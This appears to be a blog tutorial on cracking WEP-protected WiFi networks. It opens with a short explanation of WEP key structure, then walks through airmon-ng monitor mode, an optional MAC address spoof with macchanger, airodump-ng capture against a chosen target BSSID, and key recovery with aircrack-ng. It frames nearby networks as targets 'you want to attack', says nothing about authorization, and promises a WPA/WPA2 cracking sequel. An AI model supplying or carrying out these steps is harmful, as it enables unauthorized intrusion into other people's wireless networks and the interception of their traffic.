Hacking WiFi (WEP Encryption)

                                 CRACKING WEP PASSWORDS

 

 

 

 

Introduction: 

 

In this post we are going see how to crack WIFI passwords that are WEP protection on them. WEP stands for "Wired Equivalent Privacy". Wired Equivalent Privacy is an easily broken security algorithm for IEEE 802.11 wireless networks. Introduced as part of the original 802.11 standard ratified in September 1999. A 64-bit WEP key is usually entered as a string of 10 hexadecimal (base 16) characters (0-9 and A-F). Each character represents four bits, 10 digits of four bits each gives 40 bits; adding the 24-bit IV produces the complete 64-bit WEP key (4 bits × 10 + 24 bits IV = 64 bit WEP key). Most devices also allow the user to enter the key as 5 ASCII characters (0-9, a-z, A-Z), each of which is turned into eight bits using the character's byte value in ASCII (8 bits × 5 + 24 bits IV = 64 bit WEP key); however, this restricts each byte to be a printable ASCII character, which is only a small fraction of possible byte values, greatly reducing the space of possible keys.

 

 

Steps to Follow :

Step 1 :


Open the terminal window and type the following command without quotes and press ENTER key.

"airmon-ng"

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]

 

Step 2 :

In the same terminal window type the following command and press ENTER.

"airmon-ng start wlan0"

The result will be something like 

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0] 

                                                                     (monitor mode enabled on mon0)

Step 3 (Optional) :

 

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

 

Step 4 :

"airodump-ng mon0"

Now look at the terminal window and here you will see all the nearby wireless access ponits that are in your range. Select your target who you want to attack and has a  "WEP" protection enabled. Wait  for  1-2 min. Then, press "Ctrl+c" to break the program.
You will see a scree like this :

 
 

Step 5 :
 

Open a new terminal window and type the following command and hit enter 

   

"airodump-ng -c 3 -w wepcrack --bssid ff:ff:ff:ff:ff:ff mon0"

 

*where -c is the channel of your target.
           -w is the file to be written. you can give it any name.
           --bssid is the BSSID of your target.

So replace 3 with your target's channel no, ff:ff:ff:ff:ff:ff with your target's bssid and then hit enter.
Keep this terminal running because we have to capture the data that is being transmitted. Remember that you have to keep capturing the data till it reaches 25000-30000 data. 

TIP:  If more users are connected to the wireless network capturing of data will be fast. also you should not be too far from the router.

Step 6 :

The file that contains the captured data will be saved in HOME folder.  Location of HOME folder is :PLACES  (Left top corner on Desktop)>> HOME FOLDER. Now click the HOME folder and keep it open.

Step 7 :

 
To crack the WEP password just enter the command below :

aircrack-ng 'wepcrack-01.cap'

"wepcrack-01.cap"  is our captured data file located in Home folder. Just drag and drop it in the terminal and hit enter. This will now start the password cracking process and will show the password as text.

Now a days WEP protection are rearly used as they don't provide very robust protection and are able to crack easily. So now we have better and advanced protection such as WPA and WPA2. In the next part, I will show you how to crack WPA/WPA2. 

So keep visiting for more .... Have A Nice Day.